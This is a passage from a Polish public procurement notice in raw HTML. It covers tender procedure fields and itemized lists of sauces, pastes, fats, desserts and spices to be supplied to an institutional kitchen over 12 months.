<b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">W przypadku nieosiągnięcia całkowitej wartości wynagrodzenia Wykonawcy, o którym mowa w § 4 ust. 1 umowy, za zrealizowane dostawy w okresie, o którym mowa w ust. 1 umowy, Strony dopuszczają możliwość zmiany terminu obowiązywania Umowy do czasu osiągnięcia kwoty wynagrodzenia wskazanej w § 4 ust. 1 umowy, </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Rosoły, zupy, sosy, dresingi, tłuszcze, dodatki do dań, desery</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Sos podstawowy baza tak zwany Demi-Glace - bez dodatku glutaminianu sodu, bez konserwantow i sztucznych barwników, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. Opakowanie eurokontener maksimum a' 1 kg o wydajności minimum 20 litrów z 1 kg - typu Knor lun produkt równoważny ........... kg	302	SOS PIECZENIOWY -( w paście), intensywny, mięsy smak pieczeni, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu i sztucznych barwników opakowanie eurokontener maksimum a'2 kg o wydajności minimum 7 litrów z 1 kg, typu Knor lub produkt równoważny........................................................................* /	kg	243	SOS PIECZENIOWY o smaku drobiowym -, intensywny, smak pieczonego drobiu, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu i sztucznych barwników opakowanie eurokontener maksimum a'2 kg o wydajności minimum 12 litrów z 1 kg, typu Knor lub produkt rownoważny........................................................................* /	kg	104	Sos typu - CAFE de PARIS - aromatyczny ziołowy sos o unikalnej recepturze, dobrze rozpuszcza się w gorącej wodzie, zachowuje swoją jakość, kremową konsystencję (nie rozwarstwia się) podczas bemarowania. opakowanie eurokontener maksimum a' 1 kg o wydajności minimum 5 litrów z 1 kg, nie zawiera glutaminianu, sztucznych barwników i konserwantów typu Knor lub produkt równoważny- ......................	kg	405	Sos typu - CYTRYNOWO-MAŚLANY - dobrze rozpuszcza się w gorącej wodzie, o lekko kremowej konsystencji, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu, bez konserwantow i sztucznych barwników opakowanie eurokontener maksimum a' 0,8 kg o wydajności minimum 5 litrów z 1 kg ,typu Knor lub produkt rownoważny......................... kg	46	SOS CHILI SŁODKO-PIKANTNY - dodatek do drobiu oraz ryb, aromatyczny, pikantny opakowanie max 1kg..........................................................	kg	607	Sos typu -SOS Z ZIELONYM PIEPRZEM - dobrze rozpuszcza się w gorącej wodzie, pikantny, ciemny pieczeniowy sos z kawałkami zielonego pieprzu. zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu, bez konserwantow i sztucznych barwników, opakowanie eurokontener maksimum a' 1,5 kg o wydajności minimum 6,5 litra z 1 kg - typu Knor lub produkt równoważny..............................................................* / kg	208	Baza do sosu typu - FIX DO POTRAW CHIŃKICH - dobrze rozpuszcza się w gorącej wodzie, zawiera kompozycję warzyw i przypraw charakterystycznych dla potraw z dalekiego wschodu. opakowanie eurokontener maksimum a' 1 kg o wydajności minimum 11,0 litrów z 1 kg typu Knor lub produkt równoważny.............	kg	209	GRZANKI ZIOŁOWO-CZOSNKOWE- opakowanie karton max 1 kg typu Knor lub produkt rownoważny.........................................	kg	15010	GROSZEK PTYSIOWY- folia opakowanie max 1 kg ,typu Knor lub produkt rownoważny....................................................*/	kg	11011	Cebula smażona - cebulka opakowanie PET max 700g .............................................*	kg	15012	SOS SAŁATKOWY typu KOPERKOWY w proszku - stosowany dodatek do sosów na bazie oliwy lub majonezu, o charakterystycznym koperkowym smaku. opakowanie eurokontener maksimum a' 1 kg o wydajności minimum 12 litrów z 1 kg ,typu Knor lub produkt rownoważny ......................	kg	4813	SOS SAŁATKOWY typu OGRODOWY - w proszku - stosowany dodatek do sosów na bazie oliwy lub majonezu, o charakterystycznym cytrynowo-ziołowym smaku, opakowanie eurokontener maksimum a' 1 kg o wydajności minimum 8 litrów z 1 kg typu Knor lub produkt równoważny.........................	kg	1415	SOS SAŁATKOWY, typu WŁOSKI - unikalna kompozycja ziołowych przypraw, w proszku dodatkiem przypraw i warzyw i ziół - stosowany dodatek do sosów na bazie oliwy lub majonezu, opakowanie eurokontener a' 1 kg o wydajności minimum 8,5 litra z 1 kg typu Knor lub produkt równoważny....................... kg	816	SOS SAŁATKOWY typu GRECKI - w proszku z dodatkiem przypraw i warzyw i ziół- stosowany dodatek do sosów na bazie oliwy lub majonezu, o charakterystycznym smaku oregano, rozmarynu, kolendry, natki pietruszki, pieprzu cayenne, kurkumy, szalotki. opakowanie eurokontener maksimum a' 1 kg o wydajności minimum 7 litrów z 1 kg typu Knor lub produkt rownoważny..................... kg	817	Pulpa pomidorowa typu - TOMATO PRONTO - gęsta o intensywnej czerwonej barwie, z najlepszych jakościowo odmian czerwonych pomidorów. opakowanie puszka maksimum a' 2,00 kg typu Knorr lub produkt równoważny............................................................................* /	kg	70018	KONCENTRAT POMIDOROWY 30% - Produkowany z pomidorów pierwszej jakości, nie zawiera skórek i nasion. Zawiera 30% pomidorów w suchej masie. opakowanie puszka maksimum a' 1kg typu złoty Bażant,Pudliszki,Łowicz lub produkt rownoważny........................ kg	50019	Pomidory bez skórki - krojone lub w całości, opakowanie puszka 2-3 kg netto-należy podać cenę netto za surowiec bez zalewy typu Dawtona ,Pudliszki,Łowicz lub produkt równoważny.........................................	kg	120020	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA BAZYLIOWA - skład: olej roślinny bazylia (min 36%) substancje wzmacniające smak i zapach. Bez konserwantów i sztucznych barwników opakowanie słoiczek maksimum a' 0,5 kg tupu Knor lub produkt równoważny...............................................................* / kg	8,521	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA CZERWONE PESTO - skład: olej roślinny, koncentrat pomidorowy (min 12%), bazylia (min 10%), sól, substancja wzmacniająca smak i zapach. Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a' 0,5 g typu Knor lub produkt równoważny.................... kg	1822	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA CZOSNKOWA - skład: olej roślinny, koncentrat pomidorowy (min 12%), bazylia (min 10%), sól, substancja wzmacniająca smak i zapach. Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a' 0,5 g typu Knor lub produkt rownoważny.................... kg	8,523	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA GRZYBOWA - skład: olej roślinny, pieczarki (min 22%), sól, tłuszcz roślinny utwardzony, substancja wzmacniająca smak i zapach. Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a' 0,5 kg typu Knor Lub produkt rownoważny............................................................* / kg	1224	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu - PRIMERBA PESTO - olej roślinny, bazylia (min 22%), oliwa z oliwek, orzeszki pinii (min 8%), sól, substanacja wzmacniajaca smak i zapach Bez konserwantów i sztucznych barwników. opakowanie słoiczek maksimum a' 0,5 kg typu Knor lub produkt równoważny...................... kg	8,525	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu PRIMERBA PROWANSALSKA - tłuszcz roślinny, zioła i przyprawy min 38% sól, substanacja wzmacniająca smak i zapach: glutaminian sodu; czosnek (min 8%), tymianek, bazylia, rozmaryn, opakowanie słoiczek maksimum a' 0,5 kg typu Knor lub produkt rownoważny........................................*/ kg	626	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu PRIMERBA TYMIANKOWA - tłuszcz roślinny, zioła i przyprawy min 38% sól, substanacja wzmacniająca smak i zapach: glutaminian sodu; czosnek (min 8%), tymianek, bazylia, rozmaryn, opakowanie słoiczek maksimum a' 0,5 kg typu Knor lub produkt rownoważny........................................*/ kg	627	Pasta o aromatycznej kompozycji przypraw połączonych z tłuszczem i solą typu PRIMERBA ROZMARYNOWA - tłuszcz roślinny, zioła i przyprawy min 38% sól, substanacja wzmacniająca smak i zapach: glutaminian sodu; czosnek (min 8%), tymianek, bazylia, rozmaryn, opakowanie słoiczek maksimum a' 0,5 kg typu Knor lub produkt rownoważny........................................*/ kg	628	Pasta szafranowa , bez konserwantów, nadaje kolor i smak szafranu opakowanie maksimum 0,8 kg .typu Knor lub produkt rownoważny.......................................*/	kg	229	SOS SAŁATKOWY typu Czosnkowy - unikalna kompozycja ziołowych przypraw, w proszku dodatkiem przypraw i warzyw i przypraw stosowany dodatek do sosów na bazie oliwy lub majonezu, o charakterystycznym smaku czosnku opakowanie 0,9-1,0 kg typu Knor lub produkt równoważny........................................................*/ kg	830	Sos typu BARBECUE- sos o aromacie wędzonych śliwek i dymu z ogniska opakowanie 1,0-3,0 kg ......................................................*/	kg	16031	Sos typu - HOLENDERSKI - dobrze rozpuszcza się w zimnej wodzie, jasno zółty sos o wyrazistym maślano-winnym smaku, zachowuje swoją jakość (nie rozwarstwia się) podczas bemarowania. bez dodatku glutaminianu sodu, bez konserwantow i sztucznych barwników, opakowanie eurokontener 1 kg o wydajności min 6l z 1 kg typu Knor lub produkt rownoważny........................ kg	5632	Śmietana roślinna typu - Rama Cremefine Profi 31% - połączenie maślanki i tłuszczów roślinnych zawartość tłuszczu min 31%, 2,5 krotny przyrost obietości po ubiciu. Stabilna nawet 2 godziny po ubiciu. Nie żółknie zachowuje śnieżnobiały kolor. Nadaje się do zapiekania. opakowanie 1l .........................................................*/	litr	2433	Śmietana roślinna typu - Rama Cremefine Profi 15% - połączenie maślanki i tłuszczów roślinnych zawartość tłuszczu min 15%. Stosowana jako dodatek do zup i sosów, nie warzy się, dobrze łączy się ze różnymi składnikami, szczególnie kwaśnymi, opakowanie 1l .........................................................*/	litr	2434	Śmietana roślinna typu - Rama Creme Fraiche do zup i sosów 24% - połączenie maślanki i tłuszczów roślinnych zawartość tłuszczu min 24%. Posiada walory smakowe kwaśnej śmietany, Stosowana jako dodatek do zup i sosów, nie warzy się, dobrze łączy się ze różnymi składnikami, opakowanie 1l ......................................................*/	litr	2435	Tłuszcz do piecy konwekcyjno-parowych typu -Rama - Combi Profi - powoduje efekt brązowienia mięsa, zmniejsza ubytek smażonego mięsa. opakowanie max 4l.............................	litr	2036	tłuszcz uniwersalny - kostka 1 kg, zawiera 75% tłuszczu Zastosowanie: Do pieczenia, SmażeniaZagęszczania sosów (zamaszki) Smarowanie kanapek........................................	kg	2037	Pieprz zielony w zalewie - marynowany w kwasie octowym. Opakowanie puszka max 900g. Wsad 500g netto Cenę należy podać w odniesieniu do wagi wsadu netto/kg .............................................*/	kg	1038	Kapary w zalewie - Opakowanie puszka lub słoik o wadze max 1 kg . Cenę należy podać w odniesieniu do wagi wsadu surowca netto/kg .............................................*/	kg	1839	Zakwas do żurku - butelka lub kartonik o pojemnośći 0,5 - 1,0 litr typu Krakus,lub produkt równoważny.........................................................*/	litr	40040	AUSZPIK - naturalny bez konserwantów, sztucznych barwników i ulepszaczy smakowych, bez glutaminianu sodu. Dobrze rozpuszczalny w wodzie. opakowanie eurokontener maksimum a' 1 kg typu Knor lub produkt rownowazny.......................	kg	5041	MUS CZEKOLADOWY(sypki) - deser o puszystej konsystencji, Opakowanie kartonik max.1,5 kg ......................................................*/	kg	2042	MUS JOGURTOWY(sypki)-produkt do samodzielnej kompozycji deserowej, wysoka jakość. opakowanie kartonik maksimum 1 kg .............................................*/	kg	2543	POLEWY OWOCOWE DO LODÓW - opakowanie butelka min 1kg - max 1,2kg ...................................................*/	szt	1544	POLEWA CZEKOLADOWA DO LODÓW - opakowanie butelka min 1kg - max 1,2kg ...................................................*/	szt	1045	TIRAMISU (sypkie) - deser, o kremowej konsystencji, Opakowanie max 1 kg Kartonik .........	kg	1046	Sos sojowy typu kikkoman - Opakowanie 1L ... litr	1047	Sos sojowy ciemny - do zup, marynat i sosów. Opakowanie a' 500 - 1000ml. litr	1448	Pasta curry-żółta,czerwona,zielona-pasty przygotowane ze świezych tajskich sjkładników-trawa cytrynowa,papryczek chili,skórki limonki.w zależności od koloru-kurkuma,kolendra,szalotka,bazylia-opak eurokontener max 1 kg-wydajność 20 g/100 ml-zastosowanie do ryb,drobiu,mięsa owoców morza	kg	1049	Sezam biały - opakowanie max 1 kg ......kg	3<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15871260-4, 15891000-0, 15872400-5, 15411200-9, 60100000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Przyprawy jednolite i mieszane</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przyprawa typu - DELIKAT DO RYB - skład: natka pietruszki, koperek, tymianek, czosnek i imbir, nie zawiera sztucznych konserwantów i sztucznych barwników opakowanie PET maksimum a' 1kg typu Knor lub produkt rownoważny- kg	302.	Przyprawa typu - MARYNATA PREMIUM - do drobiu; gruboziarnista, z solą morską, mieszanka czerwonej papryki, czosnku, marchwi, rozmarynu, oliwy z oliwek, pieprzu cayenne, nasion kolendry, kozieradki, liści pietruszki, kurkumy i gorczycy, bez sztucznych barwników, bez glutaminianu, bez konserwantów. opakowanie PET maksimum a' 1 kg typu 